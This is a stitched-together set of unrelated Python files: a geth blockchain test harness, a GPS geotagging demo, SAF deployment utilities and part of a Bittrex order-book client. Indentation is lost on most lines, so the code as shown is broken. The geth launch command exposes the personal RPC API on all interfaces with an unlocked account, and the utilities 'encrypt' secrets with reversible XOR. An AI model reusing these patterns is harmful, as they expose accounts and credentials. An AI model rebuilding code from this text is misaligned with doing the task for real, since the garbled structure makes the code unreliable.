t = threading.Thread(target=tmp.start)
t.start()
threads.append(t)
time.sleep(0.4)
for t in threads:
            # xq: each thread must be joined because the main thread needs its results/resources
t.join()
for index in range(self.node_count):
self.accounts.append(self.nodes[index].accounts[0])
# print(self.accounts)
def __str__(self) -> str:
return ', '.join([chain_node.__repr__() for chain_node in self.nodes])
def __repr__(self) -> str:
return self.chain_id if self.chain_id else 'root chain'
def config_genesis(self) -> None:
"""Copy genesis.json file into a container."""
threads = []
for server_ip in self.ips:
t = threading.Thread(target=server_ip.put_file, args=('../config/%s' % self.config_file, self.config_file))
t.start()
threads.append(t)
time.sleep(0.02)
time.sleep(self.node_count/25)
for t in threads:
t.join()
threads = []
for node in self.nodes:
command = 'docker cp %s %s:/root/%s' % (self.config_file, node.name, self.config_file)
t = threading.Thread(target=node.ip.exec_command, args=(command,))
t.start()
threads.append(t)
print('copying genesis file')
time.sleep(0.1)
time.sleep(1)
for t in threads:
t.join()
def config_consensus_chain(self) -> None:
"""Set genesis.json for a blockchain & init with genesis.json."""
        if self.chain_id == "":
self.config_file = '0.json'
else:
self.config_file = '%s.json' % self.chain_id
generate_genesis(self.blockchain_id, self.accounts, self.config_file)
time.sleep(0.02)
self.config_genesis()
def config_leaf_chain(self, leaf_chains: ['SingleChain']) -> None:
"""Set genesis.json for leaf chains."""
        if self.chain_id == "":
self.config_file = '0.json'
else:
self.config_file = '%s.json' % self.chain_id
generate_leaf_genesis(self.config_file, leaf_chains)
time.sleep(0.02)
self.config_genesis()
def config_terminal(self) -> None:
"""Set genesis.json for terminal equipments."""
if len(self.chain_id) == 2:
self.config_file = '0.json'
else:
self.config_file = '%s.json' % self.chain_id[:-2]
self.config_genesis()
def run_nodes(self) -> None:
"""Run nodes on a chain."""
self.init_geth()
self.run_geth_nodes()
time.sleep(1)
self.construct_chain()
def init_geth(self) -> None:
"""
run geth init command for nodes in a chain
"""
if self.config_file is None:
raise ValueError("initID is not set")
threads = []
for server_ip in self.ips:
for node in self.nodes:
if node.ip == server_ip:
init_geth_command = 'docker exec -t %s geth --datadir abc init %s' % (node.name, self.config_file)
t = threading.Thread(target=server_ip.exec_command, args=(init_geth_command,))
t.start()
threads.append(t)
time.sleep(0.3)
for t in threads:
t.join()
def run_geth_nodes(self):
threads = []
for node in self.nodes:
            # Making the personal API available over RPC is not safe; using IPC instead of RPC is safer.
start_geth_command = ('/usr/bin/geth --datadir abc --cache 1024 --port 30303 --rpcport 8545 --rpcapi '
'admin,eth,miner,web3,net,personal,txpool --rpc --rpcaddr 0.0.0.0 '
'--pbftid %d --nodeindex %d --blockchainid %d --unlock %s --password '
'passfile --maxpeers 1024 --maxpendpeers 1024 --txpool.globalslots 81920 '
'--txpool.globalqueue 81920 --syncmode full '
'--nodiscover >> %s.log 2>&1') % (node.pbft_id, node.node_index,
node.blockchain_id, node.accounts[0], node.name)
command = 'docker exec -td %s bash -c \"%s\" ' % (node.name, start_geth_command)
print(start_geth_command)
t = threading.Thread(target=node.ip.exec_command, args=(command,))
t.start()
threads.append(t)
time.sleep(0.8)
for t in threads:
t.join()
print('node starting')
# must wait here
for _ in range(4):
print('.', end='')
time.sleep(1)
print()
# set enode for every node
threads = []
for node in self.nodes:
t = threading.Thread(target=node.set_enode)
t.start()
threads.append(t)
time.sleep(0.05)
for t in threads:
t.join()
time.sleep(2)
# set enode map
for node in self.nodes:
enode_value = node.enode.split('@')[0][8:]
self.map[0].setdefault(enode_value, node)
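        # Editor's note (illustrative, based on the {tag: {enode: node}} comment in __init__):
        # after run_geth_nodes(), tag 0 holds this chain's own nodes, e.g. (hypothetical,
        # values abbreviated):
        #
        #     self.map[0] == {'a1b2...': <GethNode node_index=1>, 'c3d4...': <GethNode node_index=2>, ...}
        #
        # Tags 1 and 2 are filled later by connect_lower_chain() for lower/upper peers.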
def is_root_chain(self):
"""Check if chain is root chain."""
return self.chain_id == ""
def get_primer_node(self) -> GethNode:
"""Return the primer node of the set of Geth-pbft clients."""
return self.nodes[0]
def get_node_by_index(self, node_index: int = 1) -> GethNode:
"""Return the node of a given index."""
if node_index <= 0 or node_index > len(self.nodes):
raise ValueError("node index out of range")
return self.nodes[node_index-1]
def construct_chain(self) -> None:
"""Construct a single chain."""
if not self.is_terminal:
print("constructing single chain")
start_time = time.time()
threads = []
# connect nodes in a single chain with each other
for i in range(self.node_count):
for j in range(i+1, self.node_count):
# self.nodes[i].add_peer(self.nodes[j].enode, 0)
t = threading.Thread(target=self.nodes[i].ipc_add_peer, args=(self.nodes[j].enode, 0))
t.start()
threads.append(t)
time.sleep(0.1) # 0.2
break # in case of too many addPeer requests
for t in threads:
t.join()
# print('active threads:', threading.active_count())
# # use process pool
# with ThreadPoolExecutor(max_workers=5) as executor:
# for i in range(self.node_count):
# for j in range(i + 1, self.node_count):
# executor.submit(self.connect(self.nodes[i], self.nodes[j], 0))
print("-----------chain construction waiting--------------")
time.sleep(self.node_count / 4) #
# connect all nodes to each other
un_connected_nodes = set(self.nodes)
while True:
print('-------------------------')
print(un_connected_nodes)
connected_nodes = set()
threads = []
for node in un_connected_nodes:
if node.get_peer_count() != self.node_count - 1:
print('not enough peers', node.node_index)
node_peers_info = node.get_peers()
peers = {peer['id'] for peer in node_peers_info}
peers.add(node.enode.split('@')[0][8:])
un_connected_peers = set(self.map[0].keys()).difference(peers)
# print('~~~~~~~~~~~~~~')
# print('unconnected peers: %d' % len(un_connected_peers))
# print('------------------')
# print(node.node_index, un_connected_peers)
# print('------------------')
for enode_value in un_connected_peers:
t = threading.Thread(target=node.ipc_add_peer, args=(self.map[0][enode_value].enode, 0))
t.start()
threads.append(t)
time.sleep(0.1) # 0.2
print('waiting for peers')
else:
connected_nodes.add(node)
for t in threads:
t.join()
un_connected_nodes = un_connected_nodes.difference(connected_nodes)
if not un_connected_nodes:
break
else:
time.sleep(len(un_connected_nodes) / 4)
end_time = time.time()
print('construction complete: %.3fs' % (end_time - start_time))
def connect_lower_chain(self, other_chain: 'SingleChain') -> None:
"""Connect to a lower level single chain."""
print('level:', self.level)
threads = []
for node in self.nodes:
for other in other_chain.nodes:
t = threading.Thread(target=other.ipc_add_peer, args=(node.enode, 2)) # param 2 means upper peer
t.start()
time.sleep(0.1) # if fail. increase this value.
threads.append(t)
# t1 = threading.Thread(target=node.ipc_add_peer, args=(other.enode, 1)) # param 1 means lower peer
# t1.start()
# time.sleep(0.1)
# threads.append(t1)
# time.sleep(0.3)
# break
for t in threads:
t.join()
time.sleep(self.node_count//5+1)
self.map[1].update(other_chain.map[0])
other_chain.map[2].update(self.map[0])
upper_chain_un_connected_nodes = set(self.nodes)
lower_chain_un_connected_nodes = set(other_chain.nodes)
while True:
print('--------------------')
connected_upper = set()
connected_lower = set()
threads = []
for node in upper_chain_un_connected_nodes:
upper_node_all_peers_info = node.get_peers() # all peers connected to upper chain node
# current lower chain nodes connected to upper chain node
upper_chain_current_peers = {peer['id'] for peer in upper_node_all_peers_info
if peer['flag'] == 'Low Level Peer, child'}
un_connected_peers = set(other_chain.map[0].keys()).difference(upper_chain_current_peers)
if not un_connected_peers:
connected_upper.add(node)
for enode_value in un_connected_peers:
print("enode is", enode_value)
t = threading.Thread(target=node.ipc_add_peer, args=(self.map[1][enode_value].enode, 1))
t.start()
print('connecting to lower node again')
threads.append(t)
time.sleep(0.1) #
for node in lower_chain_un_connected_nodes:
lower_node_all_peers_info = node.get_peers() # all peers connected to lower chain node
# current upper chain nodes connected to lower chain node
lower_chain_current_peers = {peer['id'] for peer in lower_node_all_peers_info
if peer['flag'] == 'Upper Level Peer, parent'}
un_connected_peers = set(self.map[0].keys()).difference(lower_chain_current_peers)
if not un_connected_peers:
connected_lower.add(node)
for enode_value in un_connected_peers:
print("enode is", enode_value)
t = threading.Thread(target=node.ipc_add_peer, args=(other_chain.map[2][enode_value].enode, 2))
t.start()
print('connecting to upper node again')
threads.append(t)
time.sleep(0.1) #
upper_chain_un_connected_nodes = upper_chain_un_connected_nodes.difference(connected_upper)
lower_chain_un_connected_nodes = lower_chain_un_connected_nodes.difference(connected_lower)
if upper_chain_un_connected_nodes or lower_chain_un_connected_nodes:
time.sleep((len(upper_chain_un_connected_nodes)+len(lower_chain_un_connected_nodes)) / 3)
else:
break
time.sleep(1)
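    # Editor's note (summary of the tag convention used above, inferred from the add_peer
    # calls and the peer 'flag' strings):
    #   tag 0 -> peer on the same chain
    #   tag 1 -> lower-level peer (appears as 'Low Level Peer, child' on the upper node)
    #   tag 2 -> upper-level peer (appears as 'Upper Level Peer, parent' on the lower node)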
def connect_upper_chain(self, other_chain: 'SingleChain') -> None:
"""Connect to an upper level single chain."""
pass
time.sleep(0.01)
threads = []
for node in self.nodes:
for other in other_chain.nodes:
ep = other.enode
t = threading.Thread(target=node.add_peer, args=(ep, 2)) # param 2 means upper peer
t.start()
threads.append(t)
time.sleep(0.05)
for t in threads:
t.join()
time.sleep(self.node_count//5+1)
# def static_construct_chain(self) -> None:
# """Use static-nodes.json to construct single chain."""
# if not self.is_terminal:
# print('constructing single chain...')
# enodes = []
# for node in self.nodes:
# enodes.append(node.enode)
# pass
def get_parent_chain_id(self) -> str:
"""Return chain ID of parent chain."""
if self.chain_id == '':
print("Root chain has no parent chain.")
return ''
else:
return self.chain_id[:-2]
def destruct_chain(self) -> None:
"""Stop containers to destruct the chain."""
threads = []
for node in self.nodes:
t = threading.Thread(target=node.stop)
t.start()
threads.append(t)
for t in threads:
t.join()
def get_node_count(self) -> int:
"""Return the number of nodes of the blockchain."""
return len(self.nodes)
def set_number(self) -> None:
"""Set (number, threshold) value for the nodes of the blockchain."""
if not self.if_set_number:
p = self.get_primer_node()
p.set_number(self.node_count, self.threshold)
self.if_set_number = True
else:
raise RuntimeError("number of chain %s already set" % self.chain_id)
time.sleep(0.5*(len(self.nodes)//10+1))
def set_level(self, max_level: int) -> None:
"""Set level info for each node."""
threads = []
if not self.if_set_level:
for node in self.nodes:
t = threading.Thread(target=node.set_level, args=(self.level, max_level))
t.start()
threads.append(t)
time.sleep(0.02)
for t in threads:
t.join()
self.if_set_level = True
time.sleep(0.05)
else:
raise RuntimeError("level of chain %s already set" % self.chain_id)
def set_id(self) -> None:
"""Set ID for a blockchain."""
        if not (self.if_set_number and self.if_set_level):
raise RuntimeError("number and level info should be set previously")
if len(self.chain_id) // 2 != self.level:
raise ValueError("length of id should match level number")
if not self.if_set_id:
if self.level == 0:
p = self.get_primer_node()
p.set_id("")
else:
threads = []
for node in self.nodes:
t = threading.Thread(target=node.set_id, args=(self.chain_id,))
t.start()
threads.append(t)
time.sleep(0.02) ###
for t in threads:
t.join()
time.sleep(0.5)
self.if_set_id = True
else:
raise RuntimeError("ID of chain %s already set" % self.chain_id)
def start_miner(self) -> None:
"""Start miners of all nodes on the chain."""
if not self.is_terminal:
threads = []
for node in self.nodes:
t = threading.Thread(target=node.start_miner)
t.start()
threads.append(t)
time.sleep(0.02)
for t in threads:
t.join()
def stop_miner(self) -> None:
"""Stop miners of all nodes on the chain."""
if not self.is_terminal:
threads = []
for node in self.nodes:
t = threading.Thread(target=node.stop_miner)
t.start()
threads.append(t)
time.sleep(0.02)
for t in threads:
t.join()
def get_log(self, node_index: int) -> None:
# time.sleep(2) #
node = self.get_node_by_index(node_index)
filename = 'chain%s_node%d.txt' % (self.chain_id, node_index)
# check if the log file exists, if True, do nothing
if os.path.exists('../data/%s' % filename):
print('log exists')
else:
node.ip.exec_command('docker cp %s:/root/result%d ./%s' % (node.name, node_index, filename))
time.sleep(0.2)
node.ip.get_file(filename, '../data/'+filename)
def search_log(self, node_index: int, block_index: int, if_get_block_tx_count: bool = True) -> None:
node = self.get_node_by_index(node_index)
filename = '../data/chain%s_node%d.txt' % (self.chain_id, node_index)
# map of (block index, {block prepare time: t1, block consensus confirm time: t2, block written time: t3})
block_time = defaultdict(dict)
with open(filename, 'r') as log:
for line in log.readlines():
line = line.strip()
arr = line.split()
if arr[0].startswith('block'):
if int(arr[1]) > node_index + 10: # in case of too many blocks
break
tmp = arr[-4].split('.')
tmp[1] = tmp[1][:6]
arr[-4] = '.'.join(tmp)
arr[-5] = arr[-5][1:]
arr[-5] += '-' + arr[-4]
block_time[arr[1]][arr[2]] = arr[-5]
# print(block_time)
if if_get_block_tx_count:
for index_str in block_time.keys():
index = int(index_str)
if index > block_index + 10: # in case of too many blocks
break
tx_count = node.get_block_transaction_count(index)
block_time[index_str]['tx_count'] = tx_count
json_name = '../data/chain%s_node%d.json' % (self.chain_id, node_index)
json_str = json.dumps(block_time, indent=2)
with open(json_name, 'w') as f:
print(json_str, file=f)
# try:
# written_time_str = block_time[str(block_index)]['written']
# written_time = datetime.strptime(written_time_str, '%Y-%m-%d-%H:%M:%S.%f') # type: datetime
# tx_count = block_time[str(block_index)]['tx_count']
# with open('../data/elapsed_time.txt', 'a') as log:
# log.write('%s block index: %d, time: %s TX count:%d\n' % (filename, block_index, written_time, tx_count))
# except KeyError as e:
# print(e)
# @staticmethod
# def connect(node1: 'GethNode', node2: 'GethNode', tag: int):
# node1.ipc_add_peer(node2.enode, tag)
# time.sleep(0.2)
if __name__ == "__main__":
ip_list = IPList(ip_file=IP_CONFIG)
ip_list.stop_all_containers()
node_count = 4
c = SingleChain(name='01', level=0, node_count=node_count, threshold=node_count*2//3+1,
blockchain_id=121, ip_list=ip_list)
c.singlechain_start()
c.config_consensus_chain()
c.run_nodes()
fail_count = 0
for i in range(1, node_count + 1):
node = c.get_node_by_index(i)
count = node.get_peer_count()
print(count)
if count != node_count - 1:
fail_count += 1
print("fail count:", fail_count)
# c.destruct_chain()
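    # Editor's note (hypothetical sketch, not executed): a lower-level chain would be built
    # with the same API and then attached below this one, roughly:
    #
    #     leaf = SingleChain(name='0101', level=1, node_count=node_count,
    #                        threshold=node_count*2//3+1, blockchain_id=122, ip_list=ip_list)
    #     leaf.singlechain_start()
    #     # ...genesis configuration for the leaf (config_leaf_chain / config_terminal)...
    #     leaf.run_nodes()
    #     c.connect_lower_chain(leaf)
    #
    # The chain id, blockchain_id and the exact genesis steps here are assumptions.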
|
monodemo.py
|
# coding: utf-8
"""Monolithic demo program
Demonstration of the workflow and commands PiG uses to geotag an image.
"""
from collections import deque
from threading import Thread
from gi.repository import GExiv2
from gps import gps, isotime, WATCH_ENABLE
from subprocess32 import Popen, PIPE, check_output
last_fix = deque([], 1)
running = True
geothread = None
def read_gps():
global last_fix
session = gps(mode=WATCH_ENABLE)
while running:
fix = session.next()
if fix['class'] == 'TPV':
fix = [fix.lon, fix.lat, fix.alt, isotime(fix.time)]
last_fix.append(fix)
def init():
global geothread
geothread = Thread(target=read_gps)
geothread.start()
def capture():
p = Popen(['gphoto2', '--wait-event-and-download'], stdout=PIPE)
while True:
line = p.stdout.readline()
fix = last_fix[0]
if not line.startswith('Saving'):
continue
image = line.rsplit(' ', 1)[-1].strip()
geotag(image, fix)
def geotag(image, fix):
fix = [float(item) for item in fix[:3]]
print image, '←', fix
exif = GExiv2.Metadata(image)
exif.set_gps_info(*fix)
exif.save_file()
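# Editor's note (illustrative, derived from read_gps above): each `fix` is a list of
# [lon, lat, alt, isotime(fix.time)]; geotag() converts the first three to floats and
# hands them to GExiv2's set_gps_info(longitude, latitude, altitude). For example a fix
# of [8.5417, 47.3769, 408.0, ...] would tag the image near Zurich. Sample values made up.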
def main():
global running
init()
try:
capture()
except KeyboardInterrupt:
pass
running = False
geothread.join()
|
safutils.py
|
# ATTENTION! File managed by Puppet. Changes will be overwritten.
from __future__ import print_function
import ConfigParser
import StringIO
import inspect
import itertools
import os
import re
import shlex
import shutil
import subprocess
import threading
import urllib
import saf
from saf.exceptions import *
from saf.packages import em
from saf.packages import requests
import logging
logger = logging.getLogger(__name__)
def method_trace(fn):
from functools import wraps
@wraps(fn)
def wrapper(*my_args, **my_kwargs):
logger.debug(
'>>> %s(%s ; %s ; %s)' % (fn.__name__, inspect.getargspec(fn), my_args, my_kwargs))
out = fn(*my_args, **my_kwargs)
logger.debug('<<< %s' % fn.__name__)
return out
return wrapper
@method_trace
def command_rc(cmd, cwd=None, assert_rc=True, silent=True):
"""
Execute shell command and (optionally, depending on silent flag) print stdout. Return rc
:param cmd: String containing the command (e.g. "git pull")
:param cwd: The directory which will be cwd for the command
:param assert_rc: If True then raise exception if command rc!=0
:param silent: If True then just log.debug(stdout). If False then log.info(stdout)
    :raises SafExecutionException: if rc!=0 (and assert_rc=True)
:return: True if rc=0, False otherwise
"""
# TODO: Cleverly combine this method with command_stdout()
proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE,
cwd=cwd)
out, err = [x.decode("utf-8") for x in proc.communicate()]
logger.debug('returned from command with proc.returncode=%s' % proc.returncode)
# remove trailing linefeeds
out = out.rstrip()
err = err.rstrip()
if silent:
logger.debug('stdout:%s' % out)
else:
logger.info('%s' % out)
logger.debug('stderr:%s' % err)
if assert_rc and proc.returncode != 0:
raise SafExecutionException(
"Error (rc:%s) when running %s: %s" % (proc.returncode, cmd, err))
return not proc.returncode
@method_trace
def command_stdout(cmd, cwd=None, assert_rc=True):
"""
Execute shell command. Return stdout
:param cmd: String containing the command (e.g. "git pull")
:param cwd: The directory which will be cwd for the command
:param assert_rc: If True then raise exception if command rc!=0
    :raises SafExecutionException: if rc!=0 (and assert_rc=True)
:return: stdout of process call
"""
proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE,
cwd=cwd)
out, err = [x.decode("utf-8") for x in proc.communicate()]
# remove trailing linefeeds
out = out.rstrip()
err = err.rstrip()
logger.debug('returned from command with proc.returncode=%s' % proc.returncode)
logger.debug('stdout:%s' % out)
logger.debug('stderr:%s' % err)
if assert_rc and proc.returncode != 0:
raise SafExecutionException(
"Error (rc:%s) when running %s: %s" % (proc.returncode, cmd, err))
return out
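# Editor's note (usage sketch for the two helpers above; commands and paths are illustrative):
#
#     if command_rc('git pull', cwd='/app/saf', silent=False):
#         branch = command_stdout('git rev-parse --abbrev-ref HEAD', cwd='/app/saf')
#
# command_rc() returns True when the process exits with rc 0; command_stdout() returns the
# captured stdout with trailing linefeeds stripped. Both raise SafExecutionException on a
# non-zero rc unless assert_rc=False.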
@method_trace
def run_process(cmd, cwd=None, log_output=True):
"""
    Run a process and tail its output forever. This method is used exclusively for that purpose.
    It should be possible to avoid a separate function for this, but I was unable to figure that
    out; it's rather tricky. If you want to try, make sure to test all possible cases.
:param cmd: The command string (e.g. "git pull")
:param cwd: The directory which will be cwd for the command
:param log_output: Whether to additionally capture the output in the logfile or just print it
:raises SafExecutionException
:return: True if shell command $?=0, False otherwise
"""
if type(cmd) is not str:
raise SafExecutionException('run_process requires a string arg')
cmd = shlex.split(cmd)
if cwd:
logger.debug('running "%s" in directory %s' % (cmd, cwd))
else:
logger.debug('running "%s"' % cmd)
process = None
try:
if log_output:
out_func = logger.info
else:
out_func = print
# http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python/437888#437888
# http://stackoverflow.com/questions/12057794/python-using-popen-poll-on-background-process#12058609
# Also tried several approaches based on
# http://stackoverflow.com/questions/12523044/how-can-i-tail-a-log-file-in-python#12523371
# but was not able to solve the "tail -f problem" (aka continuous stdout processing)
# Also failed with p.communicate()
def process_stream(myprocess, stream): # output-consuming thread
# stream is either stdout or stderr pipe of the process
next_line = None
buf = ''
while True:
out = stream.read(1)
if out == '' and myprocess.poll() is not None:
break
if out != '':
if out == '\n':
next_line = buf
buf = ''
else:
buf += out
if not next_line:
continue
line = next_line
next_line = None
out_func(line)
stream.close()
process = subprocess.Popen(cmd, cwd=cwd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout_poller = threading.Thread(target=process_stream, args=(process, process.stdout,))
stdout_poller.daemon = True
stdout_poller.start()
stderr_poller = threading.Thread(target=process_stream, args=(process, process.stderr,))
stderr_poller.daemon = True
stderr_poller.start()
# while process.poll() is None:
# logger.debug('running')
# time.sleep(1)
process.wait()
logger.debug('returned from wait() with process.returncode=%s' % process.returncode)
if stdout_poller and stdout_poller.is_alive():
logger.debug('joining stdout_poller')
stdout_poller.join()
logger.debug('joined stdout_poller')
if stderr_poller and stderr_poller.is_alive():
logger.debug('joining stderr_poller')
stderr_poller.join()
logger.debug('joined stderr_poller')
except OSError as e:
logger.error("Error in call: %s" % e)
raise SafExecutionException(e)
except KeyboardInterrupt:
logger.debug('KeyboardInterrupt')
finally:
rc = 255
termination = 'irregular'
if process and process.returncode is not None:
rc = process.returncode
termination = 'regular'
logger.debug('%s exit, rc: %s' % (termination, rc))
# negated shell returncode equals python boolean
# i.e. $?=0 returns True, $?!=0 returns False
return not rc
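# Editor's note (usage sketch, command and path are illustrative): run_process() is meant for
# long-running commands whose output should be streamed line by line, e.g.
#
#     ok = run_process('tail -f /var/log/messages', log_output=False)
#
# Each line is printed (or logged when log_output=True) as it arrives via the two poller
# threads above; the boolean result mirrors command_rc().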
@method_trace
def _get_secret():
"""
Retrieve contents of SAF secret file (/app/saf/conf/secret)
:raises SafConfigException if secret not present
:return: string representing the SAF secret
"""
secret_file_name = os.path.join(saf.base_path, 'conf', 'secret')
secret = None
try:
with open(secret_file_name, 'r') as secret_file:
for line in secret_file:
if line.startswith('#'):
continue
else:
secret = line
break
if secret is None:
raise SafConfigException('Missing secret')
return secret
except IOError as e:
raise SafConfigException(e)
@method_trace
def parse_kv_file(file_name):
"""
Retrieve contents of plain key=value file
:param file_name: The name of the file
:raises SafConfigException if the file could not be parsed
:return: dict containing all key/value pairs
"""
try:
parser = ConfigParser.ConfigParser()
# http://stackoverflow.com/questions/19359556/configparser-reads-capital-keys-and-make-them-lower-case#19359720
parser.optionxform = str
with open(file_name) as stream:
# http://stackoverflow.com/questions/2885190/using-pythons-configparser-to-read-a-file-without-section-name
fakefile = StringIO.StringIO("[top]\n" + stream.read())
parser.readfp(fakefile)
result = dict(parser.items('top'))
logger.debug('result:%s' % result)
return result
except IOError as e:
raise SafConfigException('Could not parse file: %s' % e)
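# Editor's note (illustrative): parse_kv_file() expects a plain, section-less key=value file.
# For example, a file containing
#
#     DB_HOST=db01.example.org
#     DB_PORT=5432
#
# would yield {'DB_HOST': 'db01.example.org', 'DB_PORT': '5432'}. Keys keep their case because
# optionxform is overridden above. The example keys and values are made up.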
@method_trace
def encrypt(literal):
literal = ' '.join(literal)
inf_key = itertools.chain.from_iterable(itertools.repeat(_get_secret()))
result = ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(literal, inf_key)).encode(
'base64').strip()
return '{ENC}%s' % result
@method_trace
def decrypt(literal):
if literal.startswith('{ENC}'):
inf_key = itertools.chain.from_iterable(itertools.repeat(_get_secret()))
result = ''.join(
chr(ord(a) ^ ord(b)) for a, b in zip(literal[5:].decode('base64'), inf_key))
return result
else:
raise SafExecutionException("Decrypted values must start with {ENC}")
@method_trace
def wipe_dir(dir_name):
"""
delete contents of dir_name but leave dir_name in place
:param dir_name: The name of the directory to wipe contents from
:raises SafExecutionException if IOError occurs
"""
# http://stackoverflow.com/questions/185936/delete-folder-contents-in-python#185941
for the_file in os.listdir(dir_name):
file_path = os.path.join(dir_name, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except IOError as e:
raise SafExecutionException(e)
@method_trace
def render_template(file_name, overlay_dict):
"""
Render mixin template to resolved file using empy interpreter
:param file_name: The name of the file
:param overlay_dict: Dictionary containing key=value pairs to replace
:raises SafConfigException if the file could not be rendered
:return: dict containing all key/value pairs
"""
if is_binary(file_name):
logger.debug('is_binary:%s' % file_name)
return
with open(file_name) as f:
data = f.read()
f.close()
# overlay_dict must not be modified because of is_confidential check
temp_dict = dict(overlay_dict)
is_confidential = False
for key in temp_dict.keys():
if temp_dict[key].startswith('{ENC}'):
temp_dict[key] = decrypt(temp_dict[key])
if re.search("@\(?%s\)?" % key, data) is not None:
is_confidential = True
logger.debug('is_confidential:%s' % is_confidential)
interpreter = em.Interpreter()
try:
out = interpreter.expand(data, temp_dict)
except Exception as e:
raise SafExecutionException("Problems rendering %s: %s" % (file_name, str(e)))
with open(file_name, 'w') as f:
if is_confidential:
os.chmod(f.name, 0o600)
f.write(out)
f.close()
# http://stackoverflow.com/questions/3685195/line-up-columns-of-numbers-print-output-in-table-format#3685943
@method_trace
def align_columns(lines, is_left_align=True):
cols = map(lambda *row: [str(field) or '' for field in row], *lines)
widths = [max(len(field) for field in col) for col in cols]
format = ['%%%s%ds' % ('-' if is_left_align else '', width) for width in widths]
return [' '.join(format[:len(row)]) % tuple(row) for row in lines]
# http://stackoverflow.com/questions/898669/how-can-i-detect-if-a-file-is-binary-non-text-in-python
@method_trace
def is_binary(file_name):
text_chars = bytearray([7, 8, 9, 10, 12, 13, 27]) + bytearray(range(0x20, 0x7f)) + bytearray(
range(0x80, 0x100))
    with open(file_name, 'rb') as f:
        data = f.read(1024)
    return bool(data.translate(None, text_chars))
# http://stackoverflow.com/questions/3229419/pretty-printing-nested-dictionaries-in-python
@method_trace
def prettyprint_dict(d, indent=4):
for key, value in sorted(d.iteritems()):
line = ' ' * indent + str(key)
if isinstance(value, dict):
logger.info(line + ':')
prettyprint_dict(value, indent * 2)
else:
logger.info(line + ' : ' + str(value))
# http://stackoverflow.com/questions/1392413/calculating-a-directory-size-using-python
@method_trace
def directory_size(path):
total_size = 0
seen = set()
for dirpath, dirnames, filenames in os.walk(path):
for f in filenames:
fp = os.path.join(dirpath, f)
try:
stat = os.stat(fp)
except OSError:
continue
if stat.st_ino in seen:
continue
seen.add(stat.st_ino)
total_size += stat.st_size
return total_size # size in bytes
# http://stackoverflow.com/questions/10123929/python-requests-fetch-a-file-from-a-local-url
class LocalFileAdapter(requests.adapters.BaseAdapter):
"""Protocol Adapter to allow Requests to GET file:// URLs
TODO: Properly handle non-empty hostname portions.
"""
@staticmethod
@method_trace
def _chkpath(method, path):
"""Return an HTTP status for the given filesystem path."""
if method.lower() in ('put', 'delete'):
return 501, "Not Implemented" # TODO
elif method.lower() not in ('get', 'head'):
return 405, "Method Not Allowed"
elif os.path.isdir(path):
return 400, "Path '%s' is not a file" % path
elif not os.path.isfile(path):
return 404, "File '%s' not found" % path
elif not os.access(path, os.R_OK):
return 403, "Access to '%s' denied" % path
else:
return 200, "OK"
@method_trace
def send(self, req, **kwargs):
"""Return the file specified by the given request
@type req: C{PreparedRequest}
@todo: Should I bother filling `response.headers` and processing
If-Modified-Since and friends using `os.stat`?
"""
path = os.path.normcase(os.path.normpath(urllib.url2pathname(req.path_url)))
logger.debug('path:%s' % path)
response = requests.Response()
response.status_code, response.reason = self._chkpath(req.method, path)
if response.status_code == 200 and req.method.lower() != 'head':
try:
response.raw = open(path, 'rb')
except (OSError, IOError) as err:
response.status_code = 500
response.reason = str(err)
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
response.request = req
response.connection = self
return response
@method_trace
def close(self):
pass
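    # Editor's note (usage sketch following the Stack Overflow recipe referenced above;
    # the path is illustrative): mount the adapter on a requests.Session to GET local files.
    #
    #     session = requests.Session()
    #     session.mount('file://', LocalFileAdapter())
    #     resp = session.get('file:///etc/hostname')
    #     print(resp.status_code, resp.text)
    #
    # PUT/DELETE return 501 and non-file paths map to 4xx codes, as _chkpath() shows.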
@method_trace
def assert_knowhow(knowhow_object, knowhow_key, auto_acknowledge):
""" Ensure that non-standard, project-specific SAF operating instructions are known
to the operator """
action = knowhow_key.split('.')[-1]
if knowhow_key in knowhow_object.knowhow().keys():
if auto_acknowledge:
logger.info(
"This app requires special %s handling described in %s. You acknowledged that you are familiar with these instructions." %
(action, knowhow_object.knowhow()[knowhow_key]))
else:
logger.info(
"This app requires special %s handling described in %s. Please make sure to familiarize yourself with these instructions before proceeding." %
(action, knowhow_object.knowhow()[knowhow_key]))
answer = raw_input("Ready to proceed (Y/n)? ")
if answer not in ['y', 'Y', '']:
raise SafExecutionException('Please read the instructions before proceeding')
else:
logger.debug("Nothing to know")
class IKnowhow(object):
""" Derived classes must implement a knowhow() method which has to return
a dict object containing knowhow asserts taken from app.conf """
from abc import ABCMeta, abstractmethod
__metaclass__ = ABCMeta
@abstractmethod
def knowhow(self):
""" Return a dict containing knowhow_key / -_value pairs. The
dict should be readonly """
raise NotImplementedError
class ImmutableDict(dict):
""" Use ImmutableDict for handling dicts which are meant to be readonly.
An attempt to modify the dict leads to AttributeError. This hack is not
tamper proof! It's just used to remind the coder that he is not meant to
change the dict """
def __setitem__(self, key, val):
raise AttributeError("Dict is immutable")
|
order_book.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# bittrex_websocket/order_book.py
# Stanislav Lazarov
try:
import queue as queue
except ImportError:
import Queue as queue
from copy import deepcopy
from threading import Thread
from time import sleep, time
from requests import get
from bittrex_websocket.websocket_client import BittrexSocket
class OrderBook(BittrexSocket):
def __init__(self, tickers=None, book_depth=10, conn_type='normal'):
"""
:param tickers: a list of tickers, single tickers should also be supplied as a list
:type tickers: []
:param book_depth: The depth of the order book
:type book_depth: int
:param conn_type: 'normal' direct connection or 'cloudflare' workaround
:type conn_type: str
"""
if tickers is None:
self.tickers = ['BTC-ETH']
else:
self.tickers = tickers
super(OrderBook, self).__init__(tickers=self.tickers, conn_type=conn_type)
self.book_depth = book_depth
self.tick_queue = queue.Queue()
self.snapshot_ls = deepcopy(self.tickers)
self.orderbook_events = queue.Queue()
self.api_order_books = {}
self.socket_order_books = {}
def _go(self):
# Create socket connections
self._start()
        # Get static snapshots
self.api_order_books = self._get_static_snapshots()
# Match and confirm order books
self._confirm_orderbook()
# Start syncing with updates queue
self._sync()
def on_open(self):
self.client_callbacks = ['updateExchangeState']
self.server_callbacks = ['SubscribeToExchangeDeltas', 'queryExchangeState']
